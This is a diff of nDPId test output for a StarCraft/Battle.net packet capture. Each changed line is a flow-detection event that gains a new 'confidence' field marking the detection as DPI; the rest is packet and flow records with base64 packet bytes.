 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981197,"flow_last_seen":1437389981197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389981197,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1437389981197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389981197,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EYNAAIAGHCvAqAFkUO+6Gg27AFBEOrW2AAAAAIACIAB5\/gAAAgQFtAEDAwgBAQQC"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1437389981256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1437389981256,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDbuOe0nfRDq1t2ASOQixoAAAAgQFtAAA"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1437389981256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389981256,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEYRAAIAGHDbAqAFkUO+6Gg27AFBEOrW3jntJ4FAQ+vAHdQAA"}
-00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981197,"flow_last_seen":1437389981265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1437389981265,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981197,"flow_last_seen":1437389981265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1437389981265,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981330,"flow_last_seen":1437389981330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389981330,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1437389981330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389981330,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RD1AAIAG6XXAqAFkUO+6FQ28AFBBQIDMAAAAAIACIACx5gAAAgQFtAEDAwgBAQQC"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1437389981385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1437389981385,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDbzhin+3QUCAzWASOQhgoQAAAgQFtAAA"}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1437389981385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389981385,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRD9AAIAG6X\/AqAFkUO+6FQ28AFBBQIDN4Yp\/uFAQ+vC2dQAA"}
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981330,"flow_last_seen":1437389981385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1437389981385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981330,"flow_last_seen":1437389981385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1437389981385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982130,"flow_last_seen":1437389982130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389982130,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1437389982130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389982130,"pkt":"hCYVPnXEIImEa8W6CABFAAA0Zr9AAIAGfH3AqAFk1fh\/gg29BF8F03V0AAAAAIACgABKLQAAAgQFtAEDAwABAQQC"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982140,"flow_last_seen":1437389982140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389982140,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -145,13 +145,13 @@
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1437389982183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389982183,"pkt":"hCYVPnXEIImEa8W6CABFAAAoZsBAAIAGfIjAqAFk1fh\/gg29BF8F03V122fARVAQgADvOgAA"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1437389982197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1437389982197,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDb7iEHr2BauURGASOQiM8wAAAgQFtAAA"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1437389982197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389982197,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZBAAIAGHCrAqAFkUO+6Gg2+AFAFq5RE4hB691AQ+vDixwAA"}
-00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982140,"flow_last_seen":1437389982207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1437389982207,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/alert?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982140,"flow_last_seen":1437389982207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1437389982207,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/alert?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982269,"flow_last_seen":1437389982269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389982269,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1437389982269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389982269,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RElAAIAG6WnAqAFkUO+6FQ2\/AFB8c4vnAAAAAIACIABrlQAAAgQFtAEDAwgBAQQC"}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982130,"flow_last_seen":1437389982277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1437389982277,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","ndpi": {"proto":"Starcraft","breed":"Fun","category":"Game"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982130,"flow_last_seen":1437389982277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1437389982277,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1437389982326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1437389982326,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDb8Q\/FwJfHOL6GASOQgOjQAAAgQFtAAA"}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1437389982327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389982327,"pkt":"hCYVPnXEIImEa8W6CABFAAAoREtAAIAG6XPAqAFkUO+6FQ2\/AFB8c4voEPxcClAQ+vBkYQAA"}
-00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982269,"flow_last_seen":1437389982327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1437389982327,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/alert\/en-gb","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982269,"flow_last_seen":1437389982327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1437389982327,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/alert\/en-gb","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982769,"flow_last_seen":1437389982769,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1437389982769,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1437389982769,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"ts_msec":1437389982769,"pkt":"hCYVPnXEIImEa8W6CABFAAAeGS0AAIARpdHAqAFkBSq0ms+aBF8ACqcOCQE="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982769,"flow_last_seen":1437389982769,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1437389982769,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -168,38 +168,38 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1437389983663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389983663,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EZpAAIAGHBTAqAFkUO+6Gg3BAFD6MpY\/AAAAAIACIADjdgAAAgQFtAEDAwgBAQQC"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1437389983723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1437389983723,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcFck85k+jKWQGASOQjIewAAAgQFtAAA"}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1437389983723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389983723,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZtAAIAGHB\/AqAFkUO+6Gg3BAFD6MpZAXJPOZVAQ+vAeUAAA"}
-00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983663,"flow_last_seen":1437389983723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1437389983723,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983663,"flow_last_seen":1437389983723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1437389983723,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983788,"flow_last_seen":1437389983788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389983788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1437389983788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389983788,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RFRAAIAG6V7AqAFkUO+6FQ3CAFAtDsyVAAAAAIACIAB6SQAAAgQFtAEDAwgBAQQC"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1437389983846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1437389983846,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDcLXOt3ELQ7MlmASOQjVRgAAAgQFtAAA"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1437389983846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389983846,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRFZAAIAG6WjAqAFkUO+6FQ3CAFAtDsyW1zrdxVAQ+vArGwAA"}
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983788,"flow_last_seen":1437389983846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1437389983846,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983788,"flow_last_seen":1437389983846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1437389983846,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985308,"flow_last_seen":1437389985308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985308,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1437389985308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985308,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EaZAAIAGHAjAqAFkUO+6Gg3DAFAjjlJ6AAAAAIACIAD93gAAAgQFtAEDAwgBAQQC"}
